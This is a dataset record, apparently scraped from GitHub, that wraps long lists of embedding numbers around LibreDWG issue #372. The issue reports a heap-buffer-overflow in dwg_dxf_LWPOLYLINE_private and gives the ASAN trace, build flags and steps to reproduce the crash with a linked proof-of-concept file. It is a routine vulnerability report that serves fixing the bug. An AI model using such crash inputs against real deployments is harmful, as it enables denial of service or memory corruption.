-0.0095601761713624, -0.013343190774321556, -0.001695391722023487, 0.0065322984009981155, -0.005832147318869829, -0.023900441825389862, -0.005722176283597946, -0.027463512495160103, 0.001347149140201509, 0.012302128598093987, -0.0009814943186938763, -0.01904703862965107, 0.023196624591946602, -0.019398946315050125, -0.011986877769231796, -0.028577890247106552, -0.004992699716240168, 0.0022635769564658403, -0.014281612820923328, -0.0028280967380851507, -0.0036290546413511038, 0.01117308996617794, -0.005425253417342901, 0.009787450544536114, 0.0023167298641055822, 0.015718571841716766, 0.00023506376601289958, 0.02450161799788475, -0.003432939061895013, 0.0055278935469686985, 0.010117365047335625, -0.005791824776679277, 0.00421190308406949, 0.006283029913902283, 0.0009026815532706678, -0.020894557237625122, -0.006986846681684256, 0.020249392837285995, 0.007144472561776638, 0.012126174755394459, -0.004457505419850349, -0.00031914602732285857, 0.010703878477215767, 0.014340264722704887, 0.01696491427719593, -0.04815278947353363, 0.005645196419209242, 0.013423836790025234, -0.011928225867450237, 0.026671718806028366, -0.006535964086651802, -0.016730308532714844, 0.0010355636477470398, 0.016393063589930534, 0.004098265897482634, -0.023812463507056236, -0.008717062883079052, 0.012331455014646053, -0.002806102391332388, 0.01310858502984047, 0.0021774328779429197, 0.022258201614022255, 0.009956073015928268, -0.002861088141798973, 0.0046334597282111645, 0.003962634596973658, -0.001395719824358821, -0.008115885779261589, -0.0020527986343950033, 0.008629085496068, 0.016510365530848503, 0.00568918464705348, -0.002346055582165718, 0.0072764381766319275, -0.005260296631604433, 0.019589563831686974, 0.015234698541462421, 0.02082124352455139, 0.0001241759891854599, -0.0200441125780344, 0.005898130126297474, 0.02049866132438183, 0.00708215544000268, 0.020586637780070305, 0.027742106467485428, -0.008856359869241714, -0.01301327720284462, -0.0030425407458096743, -0.009919416159391403, 0.016613006591796875, 0.0007180212996900082, -0.0012848320184275508, -0.01793266274034977, -0.006590949837118387, -0.003002217970788479, -0.0009659150382503867, 0.003297307761386037, 0.0024780211970210075, 0.020806580781936646, -0.0022269198670983315, 0.035366788506507874, -0.011158427223563194, -0.0001517833734396845, 0.0011959384428337216, 0.0189297366887331, 0.017698056995868683, -0.001267419895157218, 0.001434209756553173, -0.014772818423807621, 0.024413641542196274, -0.02929636836051941, 0.012368111871182919, 0.0052163079380989075, -0.0319356806576252, -0.010498598217964172, -0.014398915693163872, -0.019296307116746902, 0.02442830428481102, 0.003691371763125062, 0.01645171456038952, 0.007133475039154291, 0.018797770142555237, 0.003079197835177183, 0.018328558653593063, 0.016906263306736946, -0.008218525908887386, 0.006484644021838903, 0.029135078191757202, -0.010872500948607922, -0.003962634596973658, -0.011561655439436436, 0.024105720221996307, 0.003936974331736565, 0.01960422657430172, -0.010667221620678902, 0.021891631186008453, 0.016275759786367416, -0.0016651495825499296, 0.01425961870700121, 0.000553980702534318, 0.0013462327187880874, 0.01655435375869274, -0.014706836082041264, 0.0038526630960404873, -0.005337276495993137, 0.0005526060704141855, -0.01239743735641241 ]
2,324
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in dwg_dxf_LWPOLYLINE_private in dwg.spec. ASAN report: ``` ==25881==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x617000002d10 at pc 0x000000ef927b bp 0x7fffffffcb10 sp 0x7fffffffcb08 READ of size 8 at 0x617000002d10 thread T0 #0 0xef927a in dwg_dxf_LWPOLYLINE_private /src/libredwg/src/./dwg.spec:4832:14 #1 0xea80fb in dwg_dxf_LWPOLYLINE /src/libredwg/src/./dwg.spec:4790:1 #2 0xe95e19 in dwg_dxf_object /src/libredwg/src/out_dxf.c:2747:14 #3 0xe95916 in dxf_block_write /src/libredwg/src/out_dxf.c:3453:18 #4 0xe67e33 in dxf_blocks_write /src/libredwg/src/out_dxf.c:3505:20 #5 0xe41b38 in dwg_write_dxf /src/libredwg/src/out_dxf.c:3678:11 #6 0x4c864b in main /src/libredwg/programs/dxfwrite.c:451:11 #7 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41bc98 in _start (/mnt/disk/out/libredwg/programs_asan/dxfwrite+0x41bc98) 0x617000002d10 is located 0 bytes to the right of 656-byte region [0x617000002a80,0x617000002d10) allocated by thread T0 here: #0 0x4969e2 in calloc /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3 #1 0x7c2f2f in dwg_decode_LWPOLYLINE_private /src/libredwg/src/./dwg.spec:4868:5 #2 0x59d983 in dwg_decode_LWPOLYLINE /src/libredwg/src/./dwg.spec:4790:1 #3 0x58fcdf in dwg_decode_add_object /src/libredwg/src/decode.c:5833:15 #4 0x4efe14 in decode_R13_R2000 /src/libredwg/src/decode.c:1342:19 #5 0x4e77c1 in dwg_decode /src/libredwg/src/decode.c:246:36 #6 0x4c9f9e in dwg_read_file /src/libredwg/src/dwg.c:254:11 #7 0x4c8121 in main /src/libredwg/programs/dxfwrite.c:321:15 #8 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/libredwg/src/./dwg.spec:4832:14 in dwg_dxf_LWPOLYLINE_private Shadow bytes around the buggy address: 0x0c2e7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2e7fff85a0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff85b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25881==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64255.zip dxfwrite -I DWG -o /dev/null -y ./tests_64255 ``` POC file : [tests_64255.zip](https://github.com/LibreDWG/libredwg/files/6635498/tests_64255.zip)
Heap-buffer-overflow in dwg_dxf_LWPOLYLINE_private in dwg.spec
https://api.github.com/repos/LibreDWG/libredwg/issues/372/comments
0
2021-06-11T03:01:31
2021-06-27T06:36:31Z
https://github.com/LibreDWG/libredwg/issues/372
918,157,504
372
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Heap-buffer-overflow in dwg_dxf_LWPOLYLINE_private in dwg.spec Issue date: --- start body --- ## Affected version the latest commit: https://github.com/LibreDWG/libredwg/tree/45d2a290c65ed691be0901ba2b2ef51044e07a16 and 0.12.4 ## What's the problem? A heap buffer overflow was discovered in dwg_dxf_LWPOLYLINE_private in dwg.spec. ASAN report: ``` ==25881==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x617000002d10 at pc 0x000000ef927b bp 0x7fffffffcb10 sp 0x7fffffffcb08 READ of size 8 at 0x617000002d10 thread T0 #0 0xef927a in dwg_dxf_LWPOLYLINE_private /src/libredwg/src/./dwg.spec:4832:14 #1 0xea80fb in dwg_dxf_LWPOLYLINE /src/libredwg/src/./dwg.spec:4790:1 #2 0xe95e19 in dwg_dxf_object /src/libredwg/src/out_dxf.c:2747:14 #3 0xe95916 in dxf_block_write /src/libredwg/src/out_dxf.c:3453:18 #4 0xe67e33 in dxf_blocks_write /src/libredwg/src/out_dxf.c:3505:20 #5 0xe41b38 in dwg_write_dxf /src/libredwg/src/out_dxf.c:3678:11 #6 0x4c864b in main /src/libredwg/programs/dxfwrite.c:451:11 #7 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41bc98 in _start (/mnt/disk/out/libredwg/programs_asan/dxfwrite+0x41bc98) 0x617000002d10 is located 0 bytes to the right of 656-byte region [0x617000002a80,0x617000002d10) allocated by thread T0 here: #0 0x4969e2 in calloc /src/llvm-project-12.0.0.src/compiler-rt/lib/asan/asan_malloc_linux.cpp:154:3 #1 0x7c2f2f in dwg_decode_LWPOLYLINE_private /src/libredwg/src/./dwg.spec:4868:5 #2 0x59d983 in dwg_decode_LWPOLYLINE /src/libredwg/src/./dwg.spec:4790:1 #3 0x58fcdf in dwg_decode_add_object /src/libredwg/src/decode.c:5833:15 #4 0x4efe14 in decode_R13_R2000 /src/libredwg/src/decode.c:1342:19 #5 0x4e77c1 in dwg_decode /src/libredwg/src/decode.c:246:36 #6 0x4c9f9e in dwg_read_file /src/libredwg/src/dwg.c:254:11 #7 0x4c8121 in main /src/libredwg/programs/dxfwrite.c:321:15 #8 0x7ffff6ee383f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/libredwg/src/./dwg.spec:4832:14 in dwg_dxf_LWPOLYLINE_private Shadow bytes around the buggy address: 0x0c2e7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff8590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c2e7fff85a0: 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff85b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c2e7fff85c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c2e7fff85f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==25881==ABORTING ``` ## Compile command ``` CC="clang" CFLAGS="-O1 -g -fsanitize=address" ./configure --enable-release --disable-shared && make ``` ## How can we reproduce the issue? ``` unzip tests_64255.zip dxfwrite -I DWG -o /dev/null -y ./tests_64255 ``` POC file : [tests_64255.zip](https://github.com/LibreDWG/libredwg/files/6635498/tests_64255.zip) --- end body ---
4,126
[ -0.05718865618109703, -0.0007371464162133634, -0.005770394578576088, 0.0011317906901240349, 0.07603342831134796, 0.038540180772542953, 0.0016542342491447926, 0.03847474977374077, -0.005680423695594072, 0.017666976898908615, -0.003915770910680294, -0.013863668777048588, 0.03132616728544235, -0.009839524514973164, 0.00871897954493761, 0.030050218105316162, -0.0208241306245327, 0.014002714306116104, 0.0031612436287105083, -0.021723836660385132, 0.019597256556153297, -0.012325987219810486, -0.013593756593763828, 0.04498535767197609, -0.0023433282040059566, 0.020055290311574936, 0.015883920714259148, 0.014239910058677197, -0.005492303054779768, 0.021871061995625496, -0.01637466996908188, 0.03409072011709213, 0.006404278799891472, 0.02478284202516079, 0.07439760118722916, 0.0008654569392092526, 0.05430959537625313, 0.06657832860946655, -0.011131830513477325, 0.030688192695379257, -0.006257053930312395, -0.0659894272685051, -0.002778868190944195, 0.020954996347427368, -0.0007340792217291892, 0.000157320944708772, -0.005128330551087856, 0.007173119578510523, -0.02519179880619049, 0.00527964485809207, -0.018991999328136444, -0.007177209015935659, -0.033174656331539154, -0.05529109388589859, -0.00555773638188839, -0.02708936296403408, 0.009193371050059795, 0.05849732086062431, -0.0035988285671919584, 0.005565915256738663, -0.01900835707783699, 0.01686541922390461, 0.010837381705641747, 0.03212772309780121, -0.001361829461529851, -0.019122866913676262, -0.006167083512991667, 0.022934352979063988, -0.023555967956781387, -0.01846853271126747, -0.012276913039386272, -0.020889563485980034, 0.022459961473941803, 0.01202335860580206, 0.044102009385824203, -0.021036788821220398, -0.012415958568453789, 0.022198228165507317, -0.005038360133767128, 0.028136296197772026, -0.03067183308303356, 0.023719551041722298, -0.02684398926794529, 0.012538645416498184, 0.011728908866643906, -0.013487427495419979, -0.010657439939677715, -0.06294678151607513, -0.0012759482488036156, -0.042204443365335464, -0.007299896329641342, 0.030279234051704407, 0.025944281369447708, -0.025011857971549034, -0.0057254089042544365, -0.00035656007821671665, -0.026582255959510803, -0.007173119578510523, -0.05826830491423607, -0.015049646608531475, -0.05623987317085266, 0.002770689083263278, 0.0010632902849465609, 0.033665403723716736, 0.028970569372177124, 0.010812844149768353, 0.01554857473820448, 0.0010479543125256896, 0.0033473195508122444, 0.13302579522132874, 0.012661333195865154, -0.020954996347427368, -0.02362140081822872, 0.021740196272730827, -0.00676007242873311, -0.001168596907518804, 0.018533967435359955, -0.004056861158460379, -0.047766268253326416, -0.004169324412941933, -0.008489963598549366, -0.0474063865840435, -0.006101650185883045, -0.013896385207772255, -0.00780291436240077, 0.01768333464860916, -0.002699121367186308, -0.015082363039255142, -0.0457705557346344, -0.0065065184608101845, -0.0274165291339159, -0.05699235573410988, 0.0014620240544900298, -0.034908637404441833, -0.005598632153123617, 0.002175655448809266, -0.026026073843240738, 0.03811486437916756, 0.015843024477362633, 0.015311379916965961, -0.06085291877388954, -0.02605878934264183, 0.011099114082753658, 0.00008549774065613747, -0.01814136654138565, 0.013332024216651917, 0.0016450326656922698, 0.00009974736167350784, 0.008457247167825699, -0.011090935207903385, -0.005643617361783981, 0.006600578781217337, 0.031604256480932236, 0.026026073843240738, 0.049173083156347275, -0.01158986333757639, -0.006428816355764866, 0.043349526822566986, -0.005717230029404163, -0.018861133605241776, 0.0036008732859045267, -0.04256432503461838, -0.0003325337893329561, -0.026124224066734314, -0.04148467630147934, -0.0117534464225173, 0.03818029910326004, 0.022868920117616653, -0.022116437554359436, 0.02445567585527897, 0.000846542592626065, -0.023735910654067993, 0.02749832160770893, 2.555986213792494e-7, -0.0688357725739479, 0.0015642634825780988, -0.018583042547106743, 0.021331237629055977, -0.00867808423936367, -0.023147011175751686, -0.007418494205921888, -0.004686656408011913, -0.018092293292284012, 0.038736481219530106, 0.030148368328809738, -0.005328719969838858, 0.01486152596771717, -0.021102221682667732, -0.023326952010393143, -0.008085095323622227, -0.025715265423059464, -0.008019662462174892, 0.006698728539049625, -0.0015888010384514928, 0.011688013561069965, -0.010788306593894958, -0.01673455350100994, -0.007152671460062265, 0.014444389380514622, 0.0014569121412932873, -0.0006021903245709836, 0.036021001636981964, -0.03893278166651726, 0.008498142473399639, -0.02128216251730919, 0.021380312740802765, -0.012219659052789211, 0.06468076258897781, 0.015466783195734024, -0.015180513262748718, -0.03266754746437073, -0.026713121682405472, 0.011720729991793633, 0.02012072317302227, -0.027678262442350388, 0.024586541578173637, 0.010223944671452045, -0.00295267510227859, -0.021036788821220398, -0.019237374886870384, 0.029297735542058945, -0.019777199253439903, -0.0158675629645586, -0.0075616296380758286, -0.04563969001173973, -0.010600185953080654, 0.01995714008808136, 0.0017994142835959792, -0.025584399700164795, -0.001521322992630303, 0.045999571681022644, -0.027351096272468567, 0.016963569447398186, 0.014133580960333347, -0.005958514753729105, -0.004682566504925489, -0.009226087480783463, 0.0167018361389637, -0.025306308642029762, -0.016963569447398186, 0.01756882667541504, 0.012808557599782944, -0.004285877570509911, -0.03647903352975845, -0.005659975577145815, 0.03690434992313385, -0.028398029506206512, 0.012726766057312489, 0.008571755141019821, 0.02915051020681858, 0.022214587777853012, 0.0035272608511149883, 0.03965254873037338, -0.014010894112288952, 0.00798694510012865, -0.0064574433490633965, 0.023163368925452232, 0.01835402473807335, -0.027531038969755173, -0.031277090311050415, 0.032765697687864304, -0.0014364642556756735, -0.02841438725590706, 0.02437388338148594, 0.0013076425530016422, 0.011679834686219692, 0.007577987853437662, 0.0047684479504823685, 0.009340595453977585, -0.033092863857746124, 0.03145703300833702, -0.0317351259291172, -0.017388885840773582, -0.05571641027927399, -0.01370826456695795, 0.013029394671320915, 0.009495999664068222, -0.013896385207772255, 0.0191719401627779, -0.022247303277254105, -0.006257053930312395, 0.011082756333053112, -0.028479820117354393, 0.017994143068790436, 0.004604864865541458, -0.029543111100792885, 0.012195121496915817, 0.004523073323071003, -0.002919958671554923, -0.026042431592941284, -0.019908064976334572, -0.001442598644644022, -0.042858775705099106, -0.0009073750698007643, 0.006989088375121355, 0.03844203054904938, 0.01203971728682518, -0.03039374202489853, -0.017585184425115585, -0.01930280774831772, -0.012301450595259666, -0.007025894708931446, 0.004404475446790457, 0.01974448189139366, -0.010624723508954048, -0.014763375744223595, -0.036021001636981964, 0.034941352903842926, 0.009864062070846558, -0.008629009127616882, 0.03896549716591835, -0.03389441967010498, -0.022034645080566406, -0.0051855845376849174, -0.02684398926794529, -0.03454875200986862, 0.003367767436429858, -0.023228801786899567, 0.024275735020637512, 0.017176227644085884, -0.028299879282712936, 0.017748767510056496, -0.04622858762741089, 0.012972140684723854, 0.05529109388589859, -0.03075362555682659, -0.0034372902009636164, 0.03736238181591034, -0.06337209790945053, 0.01024848222732544, -0.00302015314809978, -0.011148189194500446, -0.034941352903842926, -0.02465197443962097, -0.033011071383953094, -0.054407745599746704, -0.025339024141430855, -0.0049974643625319, -0.000042301569919800386, -0.0037276502698659897, -0.025911565870046616, 0.020071648061275482, -0.004674387630075216, -0.005917618982493877, 0.0022165512200444937, -0.007712943945080042, 0.02437388338148594, -0.002302432432770729, 0.022280020639300346, 0.02453746646642685, 0.00151007657404989, 0.0705370381474495, 0.006592399440705776, 0.03104807436466217, -0.008710800670087337, 0.0022799395956099033, -0.021789271384477615, -0.01735616847872734, 0.009054325520992279, -0.018697550520300865, 0.020464247092604637, -0.0059666940942406654, -0.009193371050059795, 0.014796093106269836, 0.01740524359047413, 0.030769983306527138, -0.008808950893580914, -0.004723462276160717, -0.02787456288933754, 0.0007581054815091193, -0.03647903352975845, 0.05558554083108902, 0.0010561335366219282, -0.0057213194668293, -0.02779277041554451, -0.03175148367881775, 0.03234038129448891, 0.030213801190257072, -0.009037966839969158, 0.0028197639621794224, -0.012375062331557274, 0.017699692398309708, 0.038082148879766464, -0.05215029790997505, 0.006612847559154034, 0.028954211622476578, -0.01484516728669405, 0.03742781654000282, 0.008669905364513397, -0.04312050715088844, -0.00660875765606761, 0.05211757868528366, 0.0036560825537890196, -0.04011058062314987, 0.0037399190478026867, 0.03605371713638306, 0.029657619073987007, 0.016096578910946846, 0.0379185676574707, -0.04563969001173973, -0.005999410524964333, 0.013086649589240551, 0.009037966839969158, 0.0017360257916152477, 0.02036609686911106, 0.03402528911828995, 0.025257233530282974, 0.0075248233042657375, 0.025698907673358917, -0.005459586624056101, 0.02507729083299637, 0.012285091914236546, -0.041582826524972916, -0.014395314268767834, 0.044102009385824203, 0.009029787965118885, -0.0018587131053209305, 0.0007765085902065039, -0.050579898059368134, 0.02218187041580677, -0.012522287666797638, -0.00018134721904061735, -0.0057867527939379215, 0.02234545350074768, -0.007545270957052708, 0.0317351259291172, -0.021494820713996887, 0.02437388338148594, 0.0465884692966938, -0.030213801190257072, -0.0022165512200444937, 0.02353961020708084, 0.014313522726297379, 0.008530859835445881, -0.04400385916233063, -0.01946639083325863, -0.02841438725590706, -0.045050788670778275, -0.0028667941223829985, 0.005659975577145815, -0.011287234723567963, 0.019188299775123596, -0.017258018255233765, -0.036184586584568024, 0.018730266019701958, -0.041877277195453644, -0.012694049626588821, 0.003488409798592329, 0.021625688299536705, -0.03867104649543762, -0.03657718375325203, 0.016750911250710487, -0.022868920117616653, -0.022198228165507317, 0.0036806201096624136, -0.015450425446033478, -0.018779341131448746, -0.021053146570920944, 0.020840488374233246, -0.008130080997943878, -0.0009917226852849126, 0.025469891726970673, -0.027678262442350388, -0.005459586624056101, 0.025388099253177643, 0.051692262291908264, 0.028316237032413483, -0.023964926600456238, -0.0033125581685453653, -0.015033287927508354, -0.017830559983849525, 0.012604079209268093, 0.01846853271126747, -0.018697550520300865, -0.009455104358494282, 0.039816129952669144, -0.004895224701613188, -0.003400484099984169, -0.01511507946997881, -0.028005428612232208, -0.00286065973341465, -0.00022531018476001918, 0.01230962947010994, -0.02342510223388672, 0.01835402473807335, 0.007308075670152903, 0.006551503669470549, -0.008416350930929184, -0.009144295938313007, 0.00812190119177103, 0.04119022935628891, 0.037787698209285736, -0.036184586584568024, -0.04223715886473656, -0.024063076823949814, 0.014190834946930408, 0.0027543306350708008, 0.01702900230884552, 0.07289263606071472, 0.02551896497607231, 0.027023930102586746, -0.0135037861764431, 0.004330862779170275, -0.012751303613185883, 0.01974448189139366, -0.02432480826973915, -0.03932537883520126, 0.028316237032413483, 0.019679049029946327, -0.03158789873123169, 0.027694622054696083, -0.030213801190257072, 0.015000571496784687, -0.02003893069922924, 0.007471658755093813, -0.024717409163713455, 0.018861133605241776, -0.009127938188612461, -0.004891135264188051, 0.010641081258654594, -0.00279318168759346, -0.027890920639038086, -0.003772635478526354, 0.01115636806935072, 0.0036642616614699364, 0.03281477093696594, 0.02098771370947361, -0.015262304805219173, 0.023147011175751686, -0.011058218777179718, 0.004302235785871744, -0.0025007768999785185, -0.032683905214071274, 0.019646331667900085, -0.022541753947734833, 0.0005766304675489664, -0.01735616847872734, 0.01884477399289608, 0.012268733233213425, -0.002551896497607231, 0.0006027015624567866, 0.048715051263570786, -0.046163156628608704, 0.009078863076865673, -0.007389867212623358, 0.0214457456022501, -0.0030140189919620752, 0.03042645938694477, 0.00884166732430458, -0.013920922763645649, -0.00427769822999835, -0.00194561667740345, 0.006657832767814398, 0.009365133009850979, -0.007745660375803709, 0.015139617025852203, -0.01055928971618414, -0.004903404042124748, 0.011557146906852722, 0.005974873434752226, 0.0067437137477099895, -0.01979355700314045, 0.011663476005196571, -0.01922101527452469, 0.0019497062312439084, -0.018664833158254623, 0.013094828464090824, 0.02255811169743538, -0.05224844813346863, -0.03312557935714722, -0.0012054031249135733, -0.001888362574391067, 0.02630416490137577, 0.0034025288186967373, -0.01024848222732544, 0.009373312816023827, -0.023735910654067993, 0.01145899761468172, 0.017454318702220917, -0.02057875506579876, 0.0015591515693813562, -0.03207864984869957, -0.010281198658049107, 0.004915672354400158, 0.01776512712240219, -0.014346239157021046, -0.015990249812602997, 0.003568156622350216, 0.025617115199565887, -0.018991999328136444, 0.007291717454791069, 0.02725294604897499, 0.005504571832716465, -0.003821710590273142, 0.0018812058260664344, 0.0045148939825594425, 0.0070218052715063095, -0.01871390827000141, -0.014280806295573711, -0.0032982444390654564, -0.01294760312885046, 0.030933566391468048, 0.01484516728669405, -0.04485448822379112, -0.039848845452070236, -0.0005618057330138981, 0.042204443365335464, -0.00808100588619709, -0.04197542741894722, 0.01105003897100687, 0.027890920639038086, 0.024341167882084846, 0.03481048718094826, 0.005766304675489664, 0.023850418627262115, -0.03175148367881775, 0.01784691773355007, 0.02291799522936344, -0.02223094552755356, 0.004038458224385977, 0.007614794187247753, -0.03726423159241676, 0.019155582413077354, 0.0028770179487764835, 0.007316255010664463, 0.003189870622009039, -0.00818733498454094, 0.0034475140273571014, -0.014706121757626534, 0.006326577160507441, -0.02869247831404209, 0.023277876898646355, 0.009127938188612461, -0.03363268822431564, -0.015384991653263569, 0.03929266333580017, 0.03188234940171242, 0.0006471757078543305, -0.029215944930911064, 0.006244785618036985, -0.0006006567273288965, 0.0049688369035720825, -0.03018108382821083, 0.002519180066883564, -0.030949926003813744, 0.021985569968819618, 0.0034638724755495787, 0.001362851820886135, 0.045705121010541916, 0.04580327123403549, -0.044102009385824203, 0.00720583600923419, 0.018043218180537224, 0.01589209958910942, 0.014166297391057014, -0.010534752160310745, 0.04707922041416168, 0.0158675629645586, -0.008907100185751915, 0.005627259146422148, -0.021625688299536705, -0.02201828733086586, -0.0331910140812397, 0.018664833158254623, 0.0022124615497887135, -0.004216354805976152, -0.004858418367803097, 0.0030160637106746435, 0.04387298971414566, 0.016930852085351944, -0.010829201899468899, 0.0039382632821798325, -0.004330862779170275, 0.0062284269370138645, -0.010223944671452045, -0.026582255959510803, 0.01630105823278427, 0.02635324001312256, -0.0199898574501276, 0.026533180847764015, 0.012579541653394699, -0.008440888486802578, 0.003380036214366555, -0.011017322540283203, -0.029837559908628464, 0.005349167622625828, -0.004813433159142733, -0.008866204880177975, -0.01533591654151678, -0.0157775916159153, 0.03346910700201988, -0.035890135914087296, 0.008727159351110458, -0.002525314223021269, 0.032798413187265396, -0.035432104021310806, 0.034745052456855774, -0.030295593664050102, -0.01408450584858656, 0.0006860267021693289, -0.027760054916143417, 0.01776512712240219, -0.001817817334085703, -0.007226284127682447, 0.034287020564079285, 0.0037787698674947023, -0.009119758382439613, 0.0012616347521543503, 0.024880992248654366, -0.011638938449323177, -0.0014466881984844804, 0.0052837347611784935, -0.027105722576379776, 0.04145196080207825, 0.025159083306789398, -0.015319558791816235, 0.0012033582897856832, 0.024602901190519333, -0.00676007242873311, -0.006571951787918806, -0.011409922502934933, -0.032880205661058426, -0.005332809407263994, -0.061572685837745667, -0.013732802122831345, -0.019924422726035118, -0.0126776909455657, -0.018403099849820137, -0.001683883718214929, 0.018910208716988564, 0.013454711064696312, -0.02326151914894581, 0.03435245528817177, 0.019924422726035118, -0.0167018361389637, -0.0067559825256466866, 0.0325857549905777, -0.019237374886870384, -0.006715086754411459, -0.0026704943738877773, 0.025862490758299828, -0.013839131221175194, 0.05270648002624512, -0.02849617786705494, -0.000961050798650831, 0.004457639995962381, 0.011737088672816753, 0.006686459761112928, -0.014624330215156078, 0.015213229693472385, 0.0019016537116840482, 0.016611864790320396, -0.0017452273750677705, -0.019450033083558083, -0.014943317510187626, 0.0015295021003112197, 0.024308450520038605, -0.013969997875392437, -0.0008301843190565705, -0.015540395863354206, -0.01575305312871933, 0.02844710275530815, 0.0023310594260692596, 0.008346828632056713, 0.023686835542321205, -0.01626834087073803, 0.02033338136970997, -0.008669905364513397, 0.019319165498018265, -0.01014215312898159, 0.02296706847846508, 0.012334167025983334, 0.005819469224661589, 0.016121115535497665, 0.025797057896852493, -0.04485448822379112, 0.01802685856819153, 0.018157726153731346, 0.030900850892066956, 0.029412243515253067, -0.028561612591147423, -0.01949910633265972, -0.031309809535741806, 0.014550718478858471, -0.0042490712366998196, 0.0025927922688424587, 0.013577398844063282, -0.02033338136970997, -0.007434852421283722, 0.0019752660300582647, 0.012366883456707, 0.007299896329641342, 0.028087221086025238, -0.013266590423882008, 0.007181298919022083, -0.01819044165313244, -0.008923458866775036, 0.007557539734989405, -0.025960640981793404, -0.01202335860580206, 0.006890938617289066, -0.012072433717548847, -0.03274933993816376, -0.04423287510871887, -0.006330666597932577, -0.009790449403226376, -0.01789599284529686, 0.004805253818631172, -0.017912350594997406, 0.016832701861858368, -0.004584416747093201, 0.0019384599290788174, 0.00590535020455718, 0.009635045193135738, -0.004326773341745138, -0.014125402085483074, 0.008326380513608456, -0.0023147009778767824, -0.00469892518594861, 0.0030753626488149166, -0.02663133107125759, 0.0028627044521272182, -0.01681634411215782, -0.052379313856363297, -0.011933388188481331, -0.02180562913417816, 0.022623544558882713, 0.010313915088772774, 0.020758697763085365, 0.017912350594997406, -0.00898889172822237, -0.018452174961566925, -0.012031538411974907, 0.0064697121270000935, 0.002412850968539715, 0.03356725350022316, 0.009046146646142006, 0.015229588374495506, -0.013871847651898861, 0.03284749016165733, 0.0017421601805835962, -0.00925880391150713, -0.023196086287498474, -0.004089578054845333, -0.013168441131711006, -0.008007393218576908, -0.01966268941760063, 0.008596292696893215, -0.0028463462367653847, 0.019646331667900085, 0.02676219679415226, 0.005062897223979235, -0.03289656341075897, 0.024390242993831635, 0.002474194625392556, -0.001350583042949438, -0.01457525510340929, 0.013258411549031734, 0.02041517198085785, -0.01578577049076557, 0.03224223107099533, 0.014166297391057014, -0.01041206531226635, -0.006895028054714203, 0.02036609686911106, 0.029183227568864822, -0.01073923148214817, -0.031816914677619934, 0.016636403277516365, -0.012612258084118366, -0.024112151935696602, 0.0006124142673797905, 0.015311379916965961, 0.001785100786946714, -0.0020243411418050528, -0.04321865737438202, 0.0021122670732438564, -0.016121115535497665, 0.018501250073313713, 0.03608643636107445, -0.010403886437416077, 0.017127152532339096, -0.012219659052789211, 0.00585627555847168, -0.0004406520165503025, -0.03330552205443382, -0.015245946124196053, -0.026206014677882195, -0.012170583941042423, -0.006396099925041199, -0.011090935207903385, 